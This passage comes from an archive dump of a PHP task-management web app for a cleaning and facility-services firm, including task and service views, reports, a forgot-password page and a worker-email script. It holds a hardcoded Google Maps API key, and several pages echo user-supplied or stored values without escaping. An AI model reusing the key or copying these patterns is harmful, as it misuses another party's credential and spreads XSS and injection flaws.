'submitted_by_admin') && $subtask->submitted_by_admin): ?> <tr> <td><i class="ik ik-user icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><span class="badge badge-warning">Marked as completed by admin</span></h5></td> </tr> <?php endif; ?> <?php if ($subtask->form_submission_id): ?> <tr> <td><i class="fas fa-calendar-check icon-large"></i></td> <?php // Assuming $subtask->completed_at contains the datetime string $completedAt = $subtask->completed_at; // Create a new DateTime object with the original datetime $date = new DateTime($completedAt, new DateTimeZone('UTC')); // Set the timezone to Sydney $date->setTimezone(new DateTimeZone('Australia/Sydney')); // Format the date and time $formattedDate = $date->format('F j, Y, g:i a'); ?> <td> <h5 class="mb-0 fw-500 text-black"><?php echo $formattedDate; ?></h5> </td> </tr> <?php endif; ?> <?php endif; ?> </tbody> </table> </td> </tr> </tbody> </table> <style> table { width: 100%; border-collapse: collapse; } td { padding: 10px 15px; vertical-align: middle; } .icon-large { font-size: 24px; color: #333; } .mb-0 { margin-bottom: 0; } .fw-700 { font-weight: 700; } .fw-500 { font-weight: 500; } .text-black { color: #000; } .badge-success { background-color: #28a745; color: #fff; padding: 5px 10px; border-radius: 5px; } .badge-danger { background-color: #dc3545; color: #fff; padding: 5px 10px; border-radius: 5px; } </style> </div> </div> </div> </div> <?php if ($subtask->completed && $latitude !== null && $longitude !== null): ?> <div class="card"> <div class="card-header d-flex justify-content-between"> <h3>Submitted Location</h3> </div> <div class="card-body"> <div id="map"></div> </div> </div> <script> function initMap() { // Replace these PHP variables with actual PHP values var latitude = <?php echo $latitude; ?>; // PHP variable for latitude var longitude = <?php echo $longitude; ?>; // PHP variable for longitude // Create a map centered at a specific location var map = new google.maps.Map(document.getElementById('map'), { center: {lat: latitude, lng: longitude}, zoom: 12 // Adjust zoom level as needed }); // Add a marker at the specified location var marker = new google.maps.Marker({ position: {lat: latitude, lng: longitude}, map: map, title: 'Hello World!' // Marker tooltip (optional) }); } </script> <script async defer src="https://maps.googleapis.com/maps/api/js?key=AIzaSyD9O5PAsTaFPCHlIlM4XSK7ei-gaLMYpzk&callback=initMap"> </script> <?php endif; ?> </div> </div> <?php include('footer.php'); ?> taskprovider/viewservice.php000064400000023641151676701240012344 0ustar00<?php include('head.php'); ?> <?php require_once '../../Classes/Database.php'; require_once '../../Service/ServiceService.php'; require_once '../../Classes/System.php'; $System = new System(); $serviceService = new ServiceService(); if (!isset($_GET['id'])) { echo '<p>No service ID provided.</p>'; exit; } $serviceId = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$serviceId) { echo '<script> Swal.fire({ title: "Invalid Service ID", text: "The URL parameter is invalid. Please go back and try again.", icon: "error", confirmButtonText: "Ok" }).then(() => window.location.href = "viewservices.php"); </script>'; exit; } $service = $serviceService->getServiceById($serviceId); if (!$service) { echo '<p>Service not found.</p>'; exit; } $latitude = $service->latitude; $longitude = $service->longitude; ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Service</h5> <span>View details of a service</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="../../index.html"><i class="ik ik-home"></i></a></li> <li class="breadcrumb-item"><a href="#">Services</a></li> <li class="breadcrumb-item active" aria-current="page">View Service</li> </ol> </nav> </div> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <div class="card-header-left"> <a href="javascript:history.back()" class="btn btn-outline-primary">Back</a> </div> <div class="card-header-right"> </div> </div> </div> </div> </div> <div class="card"> <div class="card-body"> <div class="row align-items-center mb-30"> <div class="col-md-6"> <h4>General Information</h4> <table> <tbody> <tr> <td><i class="ik ik-layers icon-large"></i></td> <td><h3 class="mb-0 fw-700 text-black"><?php echo $service->name?: 'Name not provided'; ?></h3></td> </tr> <tr> <td><i class="ik ik-map-pin icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->region; ?></h5></td> </tr> </tbody> </table> <h4>Address Details</h4> <table> <tbody> <tr> <td><i class="ik ik-home icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->address_line1 ?: 'Address Line 1 not provided'; ?></h5></td> <td><i class="ik ik-home icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->address_line2 ?: 'Address Line 2 not provided'; ?></h5></td> </tr> <tr> <td><i class="ik ik-map icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->suburb ?: 'Suburb not provided'; ?></h5></td> <td><i class="ik ik-map-pin icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->city?: 'City not provided'; ?></h5></td> <tr> <td><i class="ik ik-globe icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->state ?: 'State not provided'; ?></h5></td> <td><i class="ik ik-mail icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->postal_code ?: 'Postal code not provided'; ?></h5></td> </tr> <tr> <td><i class="ik ik-flag icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->country?: 'Country not provided'; ?></h5></td> </tr> <tr> <td><i class="ik ik-phone icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->phone?: 'Phone not provided'; ?></h5></td> </tr> </tbody> </table> <h4>On Site Location</h4> <table> <tbody> <tr> <td><i class="ik ik-map-pin icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->on_site_location ?: 'Not provided'; ?></h5></td> </tr> </tbody> </table> <h4>Longitude and Latitude</h4> <table> <tbody> <tr> <td><i class="ik ik-map-pin icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->latitude ?: 'Not provided'; ?></h5></td> <td><i class="ik ik-map-pin icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->longitude ?: 'Not provided'; ?></h5></td> </tr> </tbody> </table> <h4>Timestamps</h4> <table> <tbody> <tr> <td><i class="ik ik-calendar icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo date('F j, Y, g:i a', strtotime($service->created_at)); ?></h5></td> <td><i class="ik ik-clock icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo date('F j, Y, g:i a', strtotime($service->updated_at)); ?></h5></td> </tr> </tbody> </table> <style> table { width: 100%; border-collapse: collapse; margin-bottom: 20px; } td { padding: 10px 15px; vertical-align: middle; } .icon-large { font-size: 24px; color: #333; } .mb-0 { margin-bottom: 0; } .fw-700 { font-weight: 700; } .fw-500 { font-weight: 500; } .text-black { color: #000; } </style> </div> <div class="col-md-6"> <div id="map" style="height: 400px;"></div> </div> </div> </div> </div> <?php if ($latitude !== null && $longitude !== null): ?> <script> function initMap() { var latitude = <?php echo $latitude; ?>; var longitude = <?php echo $longitude; ?>; var map = new google.maps.Map(document.getElementById('map'), { center: {lat: parseFloat(latitude), lng: parseFloat(longitude)}, zoom: 12 }); var marker = new google.maps.Marker({ position: {lat: parseFloat(latitude), lng: parseFloat(longitude)}, map: map, title: 'Service Location' }); } </script> <script async defer src="https://maps.googleapis.com/maps/api/js?key=AIzaSyD9O5PAsTaFPCHlIlM4XSK7ei-gaLMYpzk&callback=initMap"> </script> <?php endif; ?> </div> </div> <?php include('footer.php'); ?> taskprovider/footer.php000064400000000413151676701240011277 0ustar00<footer class="footer"> <div class="w-100 clearfix"> <span class="text-center text-sm-left d-md-inline-block">Copyright © 2024 genesis it labs. All Rights Reserved.</span> </div> </footer> </div> </div> <?php include('scripts.php'); ?>taskprovider/delete_task.php000064400000001574151676701240012276 0ustar00<?php require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; $System = new System(); $taskService = new TaskService(); if (isset($_POST['taskId']) && !empty($_POST['taskId'])) { $taskId= $_POST['taskId']; $decryptedtaskId = $System->decryptData($taskId); error_log("Task ID received: " . $taskId); // Check the received task ID error_log("Decrypted Task ID: " . $decryptedtaskId); // Check the decrypted task ID if (!$taskId) { echo "Invalid Task ID"; exit; } // Call deleteTaskWithSubtasks method from TaskService $deleteResult = $taskService->deleteTaskWithSubtasks($decryptedtaskId); if ($deleteResult === true) { echo "success"; } else { echo "error"; } } else { echo "Task ID is missing"; } ?> taskprovider/report_alltasks.php000064400000023214151676701240013216 0ustar00<?php include('head.php'); // Include database connection and TaskService class require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; $System = new System(); // Create TaskService instance $taskService = new TaskService(); // Initialize filters array $filters = []; // Check for filter inputs and add to the filters array if ($_SERVER['REQUEST_METHOD'] == 'GET') { if (!empty($_GET['service_name'])) { $filters['service_name'] = filter_input(INPUT_GET, 'service_name', FILTER_SANITIZE_STRING); } if (!empty($_GET['region'])) { $filters['region'] = filter_input(INPUT_GET, 'region', FILTER_SANITIZE_STRING); } if (!empty($_GET['frequency'])) { $filters['frequency'] = filter_input(INPUT_GET, 'frequency', FILTER_SANITIZE_STRING); } if (isset($_GET['public']) && $_GET['public'] !== '') { $filters['public'] = filter_input(INPUT_GET, 'public', FILTER_SANITIZE_NUMBER_INT); } if (isset($_GET['finished']) && $_GET['finished'] !== '') { $filters['finished'] = filter_input(INPUT_GET, 'finished', FILTER_SANITIZE_NUMBER_INT); } if (isset($_GET['assigned']) && $_GET['assigned'] !== '') { $filters['assigned'] = filter_input(INPUT_GET, 'assigned', FILTER_SANITIZE_NUMBER_INT); } } // Fetch tasks from the database based on filters $tasks = $taskService->getAllTasksByTaskProvider($companyId,$filters); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Tasks</h5> <span>View all tasks</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Tasks</li> </ol> </nav> </div> </div> </div> <!-- Search Form --> <div class="row mb-3"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Search Tasks</h3> </div> <div class="card-body"> <form method="GET" action=""> <div class="form-row"> <div class="form-group col-md-2"> <label for="service_name">Service Name</label> <input type="text" class="form-control" id="service_name" name="service_name" placeholder="Enter service name" value="<?php echo htmlspecialchars($_GET['service_name'] ?? ''); ?>"> </div> <div class="form-group col-md-2"> <label for="region">Region</label> <input type="text" class="form-control" id="region" name="region" placeholder="Enter region" value="<?php echo htmlspecialchars($_GET['region'] ?? ''); ?>"> </div> <div class="form-group col-md-2"> <label for="frequency">Frequency</label> <select class="form-control" id="frequency" name="frequency"> <option value="">Select</option> <option value="daily" <?php echo (isset($_GET['frequency']) && $_GET['frequency'] === 'daily') ? 'selected' : ''; ?>>Daily</option> <option value="3x/week" <?php echo (isset($_GET['frequency']) && $_GET['frequency'] === '3x/week') ? 'selected' : ''; ?>>3x/week</option> </select> </div> <div class="form-group col-md-2"> <label for="public">Public</label> <select class="form-control" id="public" name="public"> <option value="">Select</option> <option value="1" <?php echo (isset($_GET['public']) && $_GET['public'] === '1') ? 'selected' : ''; ?>>Yes</option> <option value="0" <?php echo (isset($_GET['public']) && $_GET['public'] === '0') ? 'selected' : ''; ?>>No</option> </select> </div> <div class="form-group col-md-2"> <label for="finished">Finished</label> <select class="form-control" id="finished" name="finished"> <option value="">Select</option> <option value="1" <?php echo (isset($_GET['finished']) && $_GET['finished'] === '1') ? 'selected' : ''; ?>>Yes</option> <option value="0" <?php echo (isset($_GET['finished']) && $_GET['finished'] === '0') ? 'selected' : ''; ?>>No</option> </select> </div> <div class="form-group col-md-2"> <label for="assigned">Assigned</label> <select class="form-control" id="assigned" name="assigned"> <option value="">Select</option> <option value="1" <?php echo (isset($_GET['assigned']) && $_GET['assigned'] === '1') ? 'selected' : ''; ?>>Yes</option> <option value="0" <?php echo (isset($_GET['assigned']) && $_GET['assigned'] === '0') ? 'selected' : ''; ?>>No</option> </select> </div> </div> <button type="submit" class="btn btn-primary">Apply Filters</button> <a href="report_alltasks.php" class="btn btn-secondary">Clear Filters</a> </form> </div> </div> </div> </div> <!-- End of Search Form --> <!-- Task viewing section --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"><h3>View Tasks</h3></div> <div class="card-body"> <table id="advanced_table" class="table"> <thead> <tr> <th>#</th> <th>Service Name</th> <th>Region</th> <th>Frequency</th> <th>Finished</th> <th>Assigned</th> <th>Actions</th> </tr> </thead> <tbody> <?php if (!empty($tasks)): ?> <?php foreach ($tasks as $task): ?> <tr> <td><?php echo 'TSK-000'.htmlspecialchars($task->id); ?></td> <td><?php echo htmlspecialchars($task->service_name); ?></td> <td><?php echo htmlspecialchars($task->region); ?></td> <td><?php echo htmlspecialchars($task->frequency); ?></td> <td><?php echo ($task->finished ? '<label class="badge badge-success">Finished</label>' : '<label class="badge badge-danger">Not Finished</label>'); ?></td> <td><?php echo ($task->is_assigned ? '<label class="badge badge-success">Assigned</label>' : '<label class="badge badge-danger">Not Assigned</label>'); ?></td> <td><a href="viewtask.php?id=<?php echo htmlspecialchars($System->encryptData($task->id)); ?>" class="btn btn-primary">View Details</a></td> </tr> <?php endforeach; ?> <?php else: ?> <tr> <td colspan="10">No tasks found.</td> </tr> <?php endif; ?> </tbody> </table> </div> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> taskprovider/report_subtaskswithnotes.php000064400000017540151676701240015211 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; // Initialize necessary services and objects $taskService = new TaskService(); $System = new System(); // Fetch filter parameters $startDate = $_GET['start_date'] ?? null; $endDate = $_GET['end_date'] ?? null; $serviceLocationId = $_GET['service_location_id'] ?? null; if ($_GET['filter_today'] ?? false) { $startDate = date('Y-m-d'); $endDate = date('Y-m-d'); } // Fetch all notes grouped by date without subcontractor filtering $subtasks = $taskService->getAllSubtasksWithNotesGroupByDateForTeamKidsAdmin($startDate, $endDate, $serviceLocationId); ?> <!-- Include Bootstrap Datepicker CSS --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/css/bootstrap-datepicker.min.css" /> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Tasks</h5> <span>View and Submit Notes</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="#"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">Subtasks</li> </ol> </nav> </div> </div> </div> <!-- Date Filter --> <div class="row mb-4"> <div class="col-md-3"> <div class="form-group"> <label for="startDate">Start Date</label> <input type="text" id="startDate" class="form-control datepicker" placeholder="Select start date" value="<?= htmlspecialchars($startDate) ?>"> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="endDate">End Date</label> <input type="text" id="endDate" class="form-control datepicker" placeholder="Select end date" value="<?= htmlspecialchars($endDate) ?>"> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="serviceLocationId">Select a Service Location:</label> <select id="serviceLocationId" name="serviceLocationId" class="form-control"> <option value="">All Locations</option> <?php // Populate service locations $services = $taskService->getAllServicesForDropdown(); foreach ($services as $service) { $selected = ($serviceLocationId == $service->id) ? 'selected' : ''; echo '<option value="' . htmlspecialchars($service->id) . '" ' . $selected . '>' . htmlspecialchars($service->name) . '</option>'; } ?> </select> </div> </div> <div class="col-md-3 d-flex align-items-center"> <button id="applyFilter" class="btn btn-primary">Apply Filter</button> <button type="button" id="reset_filters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> <!-- Display subtasks grouped by date --> <?php foreach ($subtasks as $date => $subtaskList) { ?> <?php // Skip if all notes are empty $allEmpty = true; foreach ($subtaskList as $subtask) { if (!empty($subtask['notes'])) { $allEmpty = false; break; } } if ($allEmpty) continue; ?> <div class="row subtask-row" data-date="<?php echo $date; ?>"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Subtasks for <?= date('l, F j, Y', strtotime($date)); ?></h3> </div> <div class="card-body"> <table class="table"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Date</th> <th>Time</th> <th>Notes</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($subtaskList as $subtask) { ?> <?php if (empty($subtask['notes'])) continue; ?> <tr> <td>ST-<?= htmlspecialchars($subtask['id']); ?></td> <td><?= htmlspecialchars($subtask['service_name']); ?></td> <td><?= htmlspecialchars($subtask['subtask_date']); ?></td> <td><?= htmlspecialchars($subtask['subtask_time'] ? date('h:i A', strtotime($subtask['subtask_time'])) : ''); ?></td> <td><?= htmlspecialchars($subtask['notes']); ?></td> <td> <a href="viewsubtask.php?id=<?= $System->encryptData($subtask['id']); ?>" class="btn btn-primary">View</a> </td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> <?php } ?> </div> </div> <?php include('footer.php'); ?> <!-- Include Scripts --> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/js/bootstrap-datepicker.min.js"></script> <script> $(document).ready(function () { // Datepicker initialization $('.datepicker').datepicker({format: 'yyyy-mm-dd', autoclose: true, todayHighlight: true}); // Apply filter $('#applyFilter').on('click', function () { var startDate = $('#startDate').val(); var endDate = $('#endDate').val(); var serviceLocationId = $('#serviceLocationId').val(); var url = window.location.href.split('?')[0] + '?start_date=' + startDate + '&end_date=' + endDate + '&service_location_id=' + serviceLocationId; window.location.href = url; }); // Reset filters $('#reset_filters').on('click', function () { window.location.href = window.location.href.split('?')[0]; }); }); </script> forgot-password.html000064400000014633151676701240010612 0ustar00<!doctype html> <html class="no-js" lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Login | ThemeKit - Admin Template</title> <meta name="description" content=""> <meta name="keywords" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="../cropped-emera-holdings-favicon-1-32x32.png" type="image/x-icon" /> <link href="https://fonts.googleapis.com/css?family=Nunito+Sans:300,400,600,700,800" rel="stylesheet"> <link rel="stylesheet" href="../node_modules/bootstrap/dist/css/bootstrap.min.css"> <link rel="stylesheet" href="../node_modules/@fortawesome/fontawesome-free/css/all.min.css"> <link rel="stylesheet" href="../node_modules/ionicons/dist/css/ionicons.min.css"> <link rel="stylesheet" href="../node_modules/icon-kit/dist/css/iconkit.min.css"> <link rel="stylesheet" href="../node_modules/perfect-scrollbar/css/perfect-scrollbar.css"> <link rel="stylesheet" href="../dist/css/theme.min.css"> <script src="../src/js/vendor/modernizr-2.8.3.min.js"></script> <style> .auth-wrapper { display: flex; justify-content: center; align-items: center; height: 100vh; } .lavalite-bg { background-size: cover; background-position: center; height: 100%; } .center-image { display: block; margin: 0 auto; } .authentication-form { width: 100%; max-width: 400px; padding: 30px; } .form-group { margin-bottom: 20px; } .sign-btn .btn-theme { width: 100%; } .register { text-align: center; margin-top: 20px; } </style> </head> <body> <div class="auth-wrapper"> <div class="container-fluid h-100"> <div class="row flex-row h-100 bg-white"> <div class="col-xl-4 col-lg-6 col-md-5 p-0 d-md-block d-lg-block d-sm-none d-none"> <!-- <div class="lavalite-bg" style="background-image: url(../src/img/cover.jpg)"></div>--> </div> <div class="col-xl-4 col-lg-6 col-md-7 my-auto p-0 d-flex align-items-center justify-content-center"> <div class="authentication-form mx-auto"> <img src="../src/img/Emera-Primary-Logo.png" alt="Emera Logo" style="height: 100px; align-items: center; display: block; margin-left: auto; margin-right: auto;"> <p class="text-center">Enter your email to reset your password</p> <form method="post" name="forgot-password" id="forgot-password"> <div class="form-group"> <input type="email" class="form-control" name="email" placeholder="Email" required> </div> <div class="sign-btn text-center"> <button class="btn btn-theme" type="submit">Reset Password</button> </div> <div id="forgot-password-error" class="alert alert-danger d-none mt-3"></div> <div id="forgot-password-success" class="alert alert-success d-none mt-3"></div> </form> <div class="register"> <p>Remembered? <a href="login.php">Sign In</a></p> </div> </div> </div> </div> </div> </div> <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script> <script src="../node_modules/bootstrap/dist/js/bootstrap.min.js"></script> <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script> <script>window.jQuery || document.write('<script src="../src/js/vendor/jquery-3.3.1.min.js"><\/script>')</script> <script src="../node_modules/bootstrap/dist/js/bootstrap.min.js"></script> <script src="../node_modules/sweetalert2/dist/sweetalert2.all.min.js"></script> <script src="../dist/js/theme.js"></script> <script> $(document).ready(function(){ $("#forgot-password").submit(function(e){ e.preventDefault(); // Disable the button to prevent multiple clicks $("#forgot-password button").prop("disabled", true); // Show a Toast notification indicating that the request is being processed Swal.fire({ icon: 'info', title: 'Processing...', toast: true, position: 'top-end', showConfirmButton: false, timer: 1500 }); var email = $("input[name='email']").val(); $.ajax({ url: 'send_reset_link.php', type: 'POST', data: {email: email}, success: function(response){ if (response.includes("Email sent")) { Swal.fire({ icon: 'success', title: 'Success!', text: response, showConfirmButton: false, timer: 2000 }); $("#forgot-password-success").text(response).removeClass("d-none"); } else { Swal.fire({ icon: 'error', title: 'Oops...', text: response }); $("#forgot-password-error").text(response).removeClass("d-none"); } }, error: function(){ Swal.fire({ icon: 'error', title: 'Oops...', text: 'An error occurred. Please try again.' }); $("#forgot-password-error").text("An error occurred. Please try again.").removeClass("d-none"); }, complete: function(){ // Re-enable the button after AJAX completes $("#forgot-password button").prop("disabled", false); } }); }); }); </script> </body> </html> send_task_email_to_workers.php000064400000014440151676701240012671 0ustar00<?php // Load .env file require_once '../vendor/autoload.php'; $dotenv = Dotenv\Dotenv::createImmutable(__DIR__ . '/../'); $dotenv->load(); // Set base URL $base_url = $_ENV['BASE_URL']; // Include necessary files require_once 'emailUtils.php'; // Ensure this file contains your sendEmail function require_once '../Service/TaskService.php'; // Adjust path as per your project structure use PHPMailer\PHPMailer\Exception; use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; // Check if the request method is POST if ($_SERVER['REQUEST_METHOD'] === 'POST') { $data = json_decode(file_get_contents("php://input"), true); // Extract action, email, and task IDs from the decoded data $action = $data['action'] ?? null; $email = $data['worker_email'] ?? null; $taskIds = $data['task_ids'] ?? []; $taskService = new TaskService(); $errors = []; $successes = []; if ($action === 'bulk') { $emailContent = ''; // Initialize variable to accumulate email content foreach ($taskIds as $taskId) { $task = $taskService->getTaskById($taskId); if ($task) { $taskDates = json_decode($task->dates, true); $taskStartDate = $taskDates[0]['date']; $taskEndDate = $taskDates[count($taskDates) - 1]['date']; // Construct task-specific content $taskContent = " <div class='task-item'> <p>Service Location: {$task->service_name}</p> <p>Dates: " . date('d/m/Y', strtotime($taskStartDate)) . " to " . date('d/m/Y', strtotime($taskEndDate)) . "</p> <p>Frequency: {$task->frequency}</p> <a href='{$base_url}/pages/taskform.php?task_id={$task->id}&email={$email}' class='button'>Fill out the form</a> </div> <hr> "; $emailContent .= $taskContent; // Append task content to accumulated email content // Update task status in the database $updateResult = $taskService->updateTaskStatusAfterMessage($taskId, $email); if (!$updateResult) { $errors[] = "Failed to update database for task ID $taskId"; } } else { $errors[] = "Task not found for ID $taskId"; } } if (empty($errors)) { $emailTemplate = " <!DOCTYPE html> <html lang='en'> <head> <meta charset='UTF-8'> <meta name='viewport' content='width=device-width, initial-scale=1.0'> <title>Service Confirmation Request</title> <style> body { font-family: Arial, sans-serif; background-color: #f9f9f9; color: #333; margin: 0; padding: 0; } .container { width: 100%; max-width: 600px; margin: 30px auto; padding: 30px; background-color: #ffffff; border: 1px solid #e0e0e0; box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1); } .header { text-align: center; padding-bottom: 20px; border-bottom: 1px solid #e0e0e0; } .header img { max-width: 150px; height: auto; } .content { line-height: 1.6; padding: 20px 0; } .details { background-color: #003763; color: #ffffff; padding: 20px; border-radius: 5px; margin: 20px 0; } .details p { margin: 0 0 10px; } .details .button { display: inline-block; padding: 10px 20px; background-color: #ffce00; color: #003763; text-decoration: none; border-radius: 5px; text-align: center; font-weight: bold; transition: background-color 0.3s; margin-top: 10px; } .details .button:hover { background-color: #e6b800; } .separator { border-bottom: 1px dashed #ffffff; margin: 20px 0; } .footer { margin-top: 30px; font-size: 12px; color: #777; text-align: center; border-top: 1px solid #e0e0e0; padding-top: 20px; } .footer ul { list-style-type: none; padding: 0; margin: 10px 0; } .footer li { margin-bottom: 5px; } .footer p { margin: 5px 0; } </style> </head> <body> <div class='container'> <div class='header'> <img src='https://emerafs.com.au/wp-content/uploads/2023/07/Emera-Primary-Logo-Color-e1691736085254.png' alt='Company Logo'> </div> <div class='content'> <p>Dear {$email},</p> <p>Please find the attached details for the upcoming services:</p> <div class='details'> {$emailContent} </div> </div> <div class='footer'> <p>Best regards,</p> <p>EMERA FACILITY SERVICE</p> <hr> <p><strong>Important:</strong></p> <ul> <li>Do not share your email with anyone.</li> </ul> </div> </div> </body> </html> "; $result = sendEmail($email, "New Tasks Assigned", $emailTemplate); if (strpos($result, 'Email sent') !== false) { $successes[] = "Bulk email sent successfully to $email"; } else { $errors[] = "Failed to send bulk email to $email: $result"; } } echo json_encode(empty($errors) ? ['status' => 'success', 'message' => $successes] : ['status' => 'partial', 'successes' => $successes, 'errors' => $errors]); } else { echo json_encode(['status' => 'error', 'message' => "Invalid action parameter: $action"]); } } else { echo json_encode(['status' => 'error', 'message' => 'Invalid request method']); } ?> subtaskform.php000064400000054632151676701240007640 0ustar00 <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Holiday Program Cleaning Checklist</title> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap" rel="stylesheet"> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; background: url('http://localhost/CleaningChecklist/cover.jpg') no-repeat center center fixed; background-size: cover; padding: 20px; margin: 0; } .container { background-color: #fff; background: linear-gradient(to right, #e2e5e7, #ffffff); box-shadow: 0 0 30px rgba(0, 0, 0, 0.3); padding: 40px; border-radius: 20px; max-width: 800px; margin: auto; } .header { text-align: center; margin-bottom: 40px; } .header img { width: 160px; height: auto; } h1 { text-align: center; font-size: 3.5em; margin-bottom: 30px; color: #1e3c72; text-shadow: 3px 3px 5px rgba(0, 0, 0, 0.3); background: linear-gradient(to right, #1e3c72, #2a5298); -webkit-background-clip: text; -webkit-text-fill-color: transparent; font-family: 'Poppins', sans-serif; } .form-group label { font-weight: bold; color: #1e3c72; font-size: 1.3em; text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.3); } .form-control { border: 2px solid #2a5298; border-radius: 10px; font-size: 1.0em; padding: 14px; width: 100%; margin-bottom: 25px; transition: all 0.3s ease; } .form-control:focus { outline: none; border-color: #1e3c72; box-shadow: 0 0 7px rgba(30, 60, 114, 0.5); } .form-check-label { font-weight: bold; color: #1e3c72; margin-left: 10px; font-size: 1.3em; text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.3); } .signature-pad { border: 2px dashed #2a5298; border-radius: 10px; height: 150px; background-color: #fff; box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2); margin-top: 25px; display: flex; justify-content: center; align-items: center; } .signature-pad:hover { border-color: #1e3c72; } .note { font-size: 1.2em; color: #1e3c72; margin-top: 25px; text-align: center; text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.3); } .section h2 { font-size: 1.5em; color: #1e3c72; margin-bottom: 20px; text-align: left; background: linear-gradient(to right, #1e3c72, #2a5298); -webkit-background-clip: text; -webkit-text-fill-color: transparent; text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.3); font-family: 'Poppins', sans-serif; } .btn-primary { background: linear-gradient(to right, #2a5298, #1e3c72); color: #fff; border: none; padding: 15px 30px; border-radius: 8px; cursor: pointer; font-size: 20px; margin-top: 35px; display: block; width: 100%; transition: all 0.3s ease; } .btn-primary:hover { background: linear-gradient(to right, #1e3c72, #2a5298); } .footer { border-top: 1px solid #ccc; padding-top: 20px; margin-top: 35px; font-size: 1em; color: #555; text-align: center; } .section { margin-bottom: 20px; } .form-check { display: flex; align-items: center; margin-bottom: 5px; } .form-check-input { width: 20px; height: 20px; margin-right: 8px; /* Small space between checkbox and label */ } .form-check-label { margin: 0; font-weight: normal; /* Ensure sentences are not bold */ } .footer a { color: #1e3c72; text-decoration: none; } .footer a:hover { text-decoration: underline; } </style> </head> <?php // Show error if no id is passed with the URL parameter, not query parameter if (!isset($_GET['subtask_id'])) { echo "Invalid Request"; exit(); } else { $subtask_id = $_GET['subtask_id']; require_once '../Service/SubtaskService.php'; $subtaskService = new SubtaskService(); $subtask = $subtaskService->getSubtaskDetailsForWorkForm($subtask_id); // Check if subtask is empty if (empty($subtask)) { echo "No subtask found"; exit(); } if($subtask->completed == 1 && $subtask->completed_at != null && $subtask->form_submission_id != null) { echo "This form has already been submitted. <br> View the submitted form <a href='completedsubtaskform.php?id=$subtask->form_submission_id'>here</a>"; exit(); } } ?> 